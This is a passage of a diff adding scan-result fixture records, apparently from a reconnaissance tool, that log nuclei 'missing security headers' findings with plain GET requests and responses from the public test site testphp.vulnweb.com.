+{ + "model": "startScan.vulnerability", + "pk": 768, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:41:57.524Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 769, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:41:57.686Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 770, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:41:57.847Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 771, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:41:58.013Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 772, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:41:58.183Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 773, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:41:58.341Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 774, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:41:58.500Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 775, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:58.667Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 776, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:58.832Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, 